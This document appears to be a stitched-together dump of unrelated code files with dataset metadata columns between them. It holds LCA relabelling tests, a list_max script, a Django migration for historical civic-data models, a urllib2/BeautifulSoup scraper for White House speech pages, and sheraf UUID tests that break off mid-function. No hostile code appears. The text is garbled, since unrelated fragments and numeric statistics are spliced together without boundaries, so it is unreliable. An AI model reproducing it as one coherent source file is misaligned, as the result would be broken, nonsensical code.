'location': 'somewhere else',
'unit': '',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':50
}
}]
}]
expected = [{
'name': 'make something',
'location': 'RoW',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':90
}
}]
}, {
'name': 'make something',
'location': 'somewhere else',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':10
}
}]
}, {
'name': 'make something else',
'location': 'RoW',
'type': 'market activity',
'exchanges': [{
'name': 'another product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':50
}
}]
}, {
'name': 'make something else',
'location': 'somewhere else',
'type': 'market activity',
'exchanges': [{
'name': 'another product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':50
}
}]
}]
# Can't directly compare dictionaries if order has changed
hashify = lambda x: {(y['name'], y['location'], y['exchanges'][0]['production volume']['amount']) for y in x}
assert hashify(relabel_global_to_row(given)) == hashify(expected)
def test_relabel_global_to_row_subtract_origianal_pv():
given = [{
'name': 'make something',
'location': 'GLO',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':100
}
}]
}, {
'name': 'make something',
'location': 'somewhere else',
'unit': '',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':10,
'subtracted activity link volume': 40,
'original amount': 50
}
}]
}]
expected = {
'name': 'make something',
'location': 'RoW',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':50,
'global amount': 100,
}
}]
}
assert next(o for o in relabel_global_to_row(given) if o['location'] == 'RoW') == expected
def test_relabel_global_to_row_subtract_pv_overspecified_regional_pv():
given = [{
'name': 'make something',
'location': 'GLO',
'unit': '',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':100
}
}]
}, {
'name': 'make something',
'location': 'somewhere else',
'unit': '',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':110
}
}]
}, {
'name': 'make something else',
'location': 'GLO',
'unit': '',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':100
}
}]
}, {
'name': 'make something else',
'location': 'somewhere else',
'unit': '',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':150
}
}]
}]
expected = [{
'name': 'make something',
'location': 'RoW',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':0
}
}]
}, {
'name': 'make something',
'location': 'somewhere else',
'type': 'market activity',
'exchanges': [{
'name': 'a product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':110
}
}]
}, {
'name': 'make something else',
'location': 'RoW',
'type': 'market activity',
'exchanges': [{
'name': 'another product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':0
}
}]
}, {
'name': 'make something else',
'location': 'somewhere else',
'type': 'market activity',
'exchanges': [{
'name': 'another product',
'type': 'reference product',
'unit': '',
'amount': 1,
'production volume':{
'amount':150
}
}]
}]
# Can't directly compare dictionaries if order has changed
hashify = lambda x: {(y['name'], y['location'], y['exchanges'][0]['production volume']['amount']) for y in x}
assert hashify(relabel_global_to_row(given)) == hashify(expected)
| 28.540212
| 113
| 0.430349
| 1,440
| 18,808
| 5.544444
| 0.069444
| 0.078156
| 0.12024
| 0.118362
| 0.948647
| 0.939755
| 0.922846
| 0.922595
| 0.915581
| 0.90506
| 0
| 0.011527
| 0.404987
| 18,808
| 658
| 114
| 28.583587
| 0.701903
| 0.01627
| 0
| 0.887147
| 0
| 0
| 0.350203
| 0
| 0
| 0
| 0
| 0
| 0.015674
| 1
| 0.017241
| false
| 0
| 0.00627
| 0
| 0.023511
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
390a9d1ad455ab629d400df635bac55e949a9b19
| 81
|
py
|
Python
|
College grade 2/Python 3/Lab_1/Sp/scrpits/3.py
|
SimonH19009/Lzu_Data-science
|
bd35c5e156b0db21c3585c11dce15fba0b7003e2
|
[
"MIT"
] | 1
|
2022-03-06T05:30:44.000Z
|
2022-03-06T05:30:44.000Z
|
College grade 2/Python 3/Lab_1/Sp/scrpits/3.py
|
SimonH19009/Lzu_Data-science
|
bd35c5e156b0db21c3585c11dce15fba0b7003e2
|
[
"MIT"
] | null | null | null |
College grade 2/Python 3/Lab_1/Sp/scrpits/3.py
|
SimonH19009/Lzu_Data-science
|
bd35c5e156b0db21c3585c11dce15fba0b7003e2
|
[
"MIT"
] | 1
|
2022-03-06T06:07:40.000Z
|
2022-03-06T06:07:40.000Z
|
def list_max(int_list):
return max(int_list)
print (list_max([1,2,8,3,10,5]))
| 27
| 32
| 0.691358
| 18
| 81
| 2.888889
| 0.666667
| 0.269231
| 0.384615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097222
| 0.111111
| 81
| 3
| 32
| 27
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
394e9555540933c70f9f6e77bb7923c0d722d525
| 28,185
|
py
|
Python
|
mainapp/migrations/0006_historicalagendaitem_historicalbody_historicalconsultation_historicalfile_historicallegislativeterm_.py
|
stv0g/meine-stadt-transparent
|
059f7d25c5d11f476a8856928bed389f529f8546
|
[
"MIT"
] | 34
|
2017-10-04T14:20:41.000Z
|
2022-03-11T18:06:48.000Z
|
mainapp/migrations/0006_historicalagendaitem_historicalbody_historicalconsultation_historicalfile_historicallegislativeterm_.py
|
stv0g/meine-stadt-transparent
|
059f7d25c5d11f476a8856928bed389f529f8546
|
[
"MIT"
] | 588
|
2017-10-14T18:31:17.000Z
|
2022-03-16T13:00:30.000Z
|
mainapp/migrations/0006_historicalagendaitem_historicalbody_historicalconsultation_historicalfile_historicallegislativeterm_.py
|
stv0g/meine-stadt-transparent
|
059f7d25c5d11f476a8856928bed389f529f8546
|
[
"MIT"
] | 11
|
2017-11-27T10:12:59.000Z
|
2022-02-09T10:27:11.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2018-01-14 14:36
from __future__ import unicode_literals
import django.db.models.deletion
import djgeojson.fields
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('mainapp', '0005_auto_20180112_1229'),
]
operations = [
migrations.CreateModel(
name='HistoricalAgendaItem',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('created', models.DateTimeField(blank=True, editable=False)),
('modified', models.DateTimeField(blank=True, editable=False)),
('deleted', models.BooleanField(default=False)),
('key', models.CharField(blank=True, max_length=20, null=True)),
('title', models.TextField()),
('position', models.IntegerField()),
('public', models.NullBooleanField()),
('result', models.TextField(blank=True, null=True)),
('resolution_text', models.TextField(blank=True, null=True)),
('start', models.DateTimeField(blank=True, null=True)),
('end', models.DateTimeField(blank=True, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type',
models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
('consultation', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
to='mainapp.Consultation')),
('history_user',
models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to=settings.AUTH_USER_MODEL)),
('meeting', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
to='mainapp.Meeting')),
('resolution_file', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
to='mainapp.File')),
],
options={
'verbose_name': 'historical agenda item',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
),
migrations.CreateModel(
name='HistoricalBody',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('created', models.DateTimeField(blank=True, editable=False)),
('modified', models.DateTimeField(blank=True, editable=False)),
('deleted', models.BooleanField(default=False)),
('name', models.TextField()),
('short_name', models.CharField(max_length=50)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type',
models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
('center', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
to='mainapp.Location')),
('history_user',
models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to=settings.AUTH_USER_MODEL)),
('outline', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
to='mainapp.Location')),
],
options={
'verbose_name': 'historical body',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
),
migrations.CreateModel(
name='HistoricalConsultation',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('created', models.DateTimeField(blank=True, editable=False)),
('modified', models.DateTimeField(blank=True, editable=False)),
('deleted', models.BooleanField(default=False)),
('title', models.TextField(blank=True, null=True)),
('authoritative', models.NullBooleanField()),
('role', models.CharField(blank=True, max_length=200, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type',
models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
('history_user',
models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to=settings.AUTH_USER_MODEL)),
('meeting', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
to='mainapp.Meeting')),
('paper', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
to='mainapp.Paper')),
],
options={
'verbose_name': 'historical consultation',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
),
migrations.CreateModel(
name='HistoricalFile',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('created', models.DateTimeField(blank=True, editable=False)),
('modified', models.DateTimeField(blank=True, editable=False)),
('deleted', models.BooleanField(default=False)),
('name', models.CharField(max_length=200)),
('storage_filename', models.CharField(max_length=200)),
('displayed_filename', models.CharField(max_length=200)),
('mime_type', models.CharField(max_length=255)),
('legal_date', models.DateField(blank=True, null=True)),
('sort_date', models.DateTimeField(blank=True, editable=False)),
('filesize', models.IntegerField()),
('page_count', models.IntegerField(blank=True, null=True)),
('parsed_text', models.TextField(blank=True, null=True)),
('license', models.CharField(blank=True, max_length=200, null=True)),
('description', models.TextField(blank=True, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type',
models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
('history_user',
models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical file',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
),
migrations.CreateModel(
name='HistoricalLegislativeTerm',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('created', models.DateTimeField(blank=True, editable=False)),
('modified', models.DateTimeField(blank=True, editable=False)),
('deleted', models.BooleanField(default=False)),
('name', models.TextField()),
('short_name', models.CharField(max_length=50)),
('start', models.DateField()),
('end', models.DateField()),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type',
models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
('history_user',
models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical legislative term',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
),
migrations.CreateModel(
name='HistoricalLocation',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('created', models.DateTimeField(blank=True, editable=False)),
('modified', models.DateTimeField(blank=True, editable=False)),
('deleted', models.BooleanField(default=False)),
('name', models.TextField()),
('short_name', models.CharField(max_length=50)),
('description', models.TextField(blank=True, null=True)),
('is_official', models.BooleanField()),
('osm_id', models.BigIntegerField(blank=True, null=True)),
('geometry', djgeojson.fields.GeometryField(default=None)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type',
models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
('history_user',
models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical location',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
),
migrations.CreateModel(
name='HistoricalMeeting',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('created', models.DateTimeField(blank=True, editable=False)),
('modified', models.DateTimeField(blank=True, editable=False)),
('deleted', models.BooleanField(default=False)),
('name', models.TextField()),
('short_name', models.CharField(max_length=50)),
('cancelled', models.BooleanField()),
('start', models.DateTimeField()),
('end', models.DateTimeField(blank=True, null=True)),
('public', models.IntegerField(blank=True, choices=[(0, 'unknown'), (1, 'public'), (2, 'not public'),
(3, 'splitted')], default=0)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type',
models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
('history_user',
models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to=settings.AUTH_USER_MODEL)),
('invitation', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
to='mainapp.File')),
('location', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
to='mainapp.Location')),
('results_protocol', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
to='mainapp.File')),
('verbatim_protocol', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name='+', to='mainapp.File')),
],
options={
'verbose_name': 'historical meeting',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
),
migrations.CreateModel(
name='HistoricalOrganization',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('created', models.DateTimeField(blank=True, editable=False)),
('modified', models.DateTimeField(blank=True, editable=False)),
('deleted', models.BooleanField(default=False)),
('name', models.TextField()),
('short_name', models.CharField(max_length=50)),
('start', models.DateField(blank=True, null=True)),
('end', models.DateField(blank=True, null=True)),
('color', models.CharField(blank=True, max_length=6, null=True)),
('logo', models.CharField(blank=True, max_length=255, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type',
models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
('body', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
to='mainapp.Body')),
('history_user',
models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to=settings.AUTH_USER_MODEL)),
('location', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
to='mainapp.Location')),
('organization_type', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name='+', to='mainapp.OrganizationType')),
],
options={
'verbose_name': 'historical organization',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
),
migrations.CreateModel(
name='HistoricalOrganizationMembership',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('created', models.DateTimeField(blank=True, editable=False)),
('modified', models.DateTimeField(blank=True, editable=False)),
('deleted', models.BooleanField(default=False)),
('start', models.DateField(blank=True, null=True)),
('end', models.DateField(blank=True, null=True)),
('role', models.CharField(blank=True, max_length=200, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type',
models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
('history_user',
models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to=settings.AUTH_USER_MODEL)),
('organization', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
to='mainapp.Organization')),
('person', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
to='mainapp.Person')),
],
options={
'verbose_name': 'historical organization membership',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
),
migrations.CreateModel(
name='HistoricalPaper',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('created', models.DateTimeField(blank=True, editable=False)),
('modified', models.DateTimeField(blank=True, editable=False)),
('deleted', models.BooleanField(default=False)),
('name', models.TextField()),
('short_name', models.CharField(max_length=50)),
('reference_number', models.CharField(max_length=50)),
('description', models.TextField(blank=True, null=True)),
('legal_date', models.DateField(blank=True, null=True)),
('sort_date', models.DateTimeField(blank=True, editable=False)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type',
models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
('change_request_of', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING,
related_name='+', to='mainapp.HistoricalPaper')),
('history_user',
models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to=settings.AUTH_USER_MODEL)),
('main_file', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
to='mainapp.File')),
('paper_type', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
to='mainapp.PaperType')),
],
options={
'verbose_name': 'historical paper',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
),
migrations.CreateModel(
name='HistoricalPerson',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('created', models.DateTimeField(blank=True, editable=False)),
('modified', models.DateTimeField(blank=True, editable=False)),
('deleted', models.BooleanField(default=False)),
('name', models.CharField(max_length=100)),
('given_name', models.CharField(max_length=50)),
('family_name', models.CharField(max_length=50)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type',
models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
('history_user',
models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to=settings.AUTH_USER_MODEL)),
('location', models.ForeignKey(blank=True, db_constraint=False, null=True,
on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
to='mainapp.Location')),
],
options={
'verbose_name': 'historical person',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
),
migrations.CreateModel(
name='HistoricalSearchPoi',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('created', models.DateTimeField(blank=True, editable=False)),
('modified', models.DateTimeField(blank=True, editable=False)),
('deleted', models.BooleanField(default=False)),
('displayed_name', models.CharField(max_length=1000)),
('osm_id', models.BigIntegerField(blank=True, null=True)),
('osm_amenity', models.CharField(max_length=1000, null=True)),
('geometry', djgeojson.fields.GeometryField(null=True)),
('exclude_from_search', models.BooleanField(default=False)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type',
models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
('history_user',
models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical search poi',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
),
migrations.CreateModel(
name='HistoricalSearchStreet',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
('created', models.DateTimeField(blank=True, editable=False)),
('modified', models.DateTimeField(blank=True, editable=False)),
('deleted', models.BooleanField(default=False)),
('displayed_name', models.CharField(max_length=1000)),
('osm_id', models.BigIntegerField(blank=True, null=True)),
('exclude_from_search', models.BooleanField(default=False)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type',
models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
('history_user',
models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical search street',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
),
]
| 63.337079
| 120
| 0.532872
| 2,551
| 28,185
| 5.695414
| 0.071345
| 0.062565
| 0.034827
| 0.051483
| 0.898548
| 0.890701
| 0.864409
| 0.853465
| 0.850506
| 0.847477
| 0
| 0.009902
| 0.322796
| 28,185
| 444
| 121
| 63.47973
| 0.751297
| 0.002413
| 0
| 0.753425
| 1
| 0
| 0.149641
| 0.016575
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011416
| 0
| 0.018265
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1a434c4de65db64b3cbe62c4dd93090fd4774829
| 2,227
|
py
|
Python
|
Python_Scripts/pages.py
|
jmausolf/White_House_Speeches
|
b0590cc2362f2452a6d9bec977161095b5231e03
|
[
"MIT"
] | 1
|
2021-04-19T10:19:27.000Z
|
2021-04-19T10:19:27.000Z
|
Python_Scripts/pages.py
|
jmausolf/White_House_Speeches
|
b0590cc2362f2452a6d9bec977161095b5231e03
|
[
"MIT"
] | null | null | null |
Python_Scripts/pages.py
|
jmausolf/White_House_Speeches
|
b0590cc2362f2452a6d9bec977161095b5231e03
|
[
"MIT"
] | null | null | null |
##################################
### ###
### Joshua G. Mausolf ###
### Computation Institute ###
### University of Chicago ###
### ###
##################################
def pages(url):
"""Returns the number of additional pages for a given parent URL"""
import urllib2,sys
from bs4 import BeautifulSoup
#Base Page
soup = BeautifulSoup(urllib2.urlopen(url).read())
#Page Counter
page_counter = soup.find("div", {"class":"item-list"})
try:
paragraph = ["".join(x.findAll(text=True)) for x in page_counter.findAll("li", {"class":"pager-item"})]
return len(paragraph)
except:
return 0
def pages_current(url):
"""Returns the number of additional pages for a given parent URL"""
import urllib2,sys
from bs4 import BeautifulSoup
#Base Page
soup = BeautifulSoup(urllib2.urlopen(url).read())
#Page Counter
page_counter = soup.find("div", {"class":"item-list"})
try:
paragraph = ["".join(x.findAll(text=True)) for x in page_counter.findAll("li", {"class":"pager-current"})]
return len(paragraph)
except:
return 0
def sub_pages_URLs(parent_url):
"""The function creates a list of subpages given a parent URL.
It makes use of the pages(url) function."""
base_url = parent_url+"?page="
# Number of Pages
total_pages = pages(parent_url)
try:
f=open('subpages.csv', 'a')
for i in range(0, total_pages+1):
sub_page_url = base_url+str(i)
f.write(u'%s\n' % (sub_page_url))
finally:
f.close()
def sub_pages_URLs_current(parent_url):
"""The function creates a list of subpages given a parent URL.
It makes use of the pages(url) function."""
base_url = parent_url+"?page="
# Number of Pages
total_pages = pages_current(parent_url)
try:
f=open('subpages.csv', 'a')
for i in range(0, total_pages+1):
sub_page_url = base_url+str(i)
f.write(u'%s\n' % (sub_page_url))
finally:
f.close()
#sub_pages_URLs_current("https://www.whitehouse.gov/briefing-room/Speeches-and-Remarks")
| 27.493827
| 114
| 0.580602
| 288
| 2,227
| 4.364583
| 0.284722
| 0.071599
| 0.031822
| 0.030231
| 0.844869
| 0.844869
| 0.844869
| 0.790772
| 0.790772
| 0.790772
| 0
| 0.007268
| 0.258644
| 2,227
| 80
| 115
| 27.8375
| 0.754088
| 0.281545
| 0
| 0.8
| 0
| 0
| 0.079973
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.1
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1aa89979f630b5e201d2d61f3c58dafd210feed6
| 2,561
|
py
|
Python
|
tests/attributes/test_uuid.py
|
yaal-fr/sheraf
|
9821a53d8b0ea0aba420175e4cfa81529262f88c
|
[
"MIT"
] | 1
|
2020-03-18T09:54:52.000Z
|
2020-03-18T09:54:52.000Z
|
tests/attributes/test_uuid.py
|
yaal-fr/sheraf
|
9821a53d8b0ea0aba420175e4cfa81529262f88c
|
[
"MIT"
] | null | null | null |
tests/attributes/test_uuid.py
|
yaal-fr/sheraf
|
9821a53d8b0ea0aba420175e4cfa81529262f88c
|
[
"MIT"
] | null | null | null |
import numbers
import uuid
import pytest
import sheraf
import tests
def test_uuid_is_not_autocreated(sheraf_database):
class UUIDModel(tests.UUIDAutoModel):
my_uuid = sheraf.UUIDAttribute()
with sheraf.connection():
m = UUIDModel.create()
assert m.my_uuid is None
def test_reset_uuid_to_none(sheraf_connection):
class UUIDModel(tests.UUIDAutoModel):
my_uuid = sheraf.UUIDAttribute()
m = UUIDModel.create()
m.my_uuid = uuid.uuid4()
m = UUIDModel.read(m.id)
assert isinstance(m.my_uuid, uuid.UUID)
m.my_uuid = None
m = UUIDModel.read(m.id)
assert m.my_uuid is None
def test_bad_uuid(sheraf_connection):
class UUIDModel(tests.UUIDAutoModel):
my_uuid = sheraf.UUIDAttribute()
m = UUIDModel.create()
with pytest.raises(ValueError):
m.my_uuid = "yolo"
def test_create_with_an_existing_uuid(sheraf_database):
class UUIDModel(tests.UUIDAutoModel):
my_uuid = sheraf.UUIDAttribute()
with sheraf.connection():
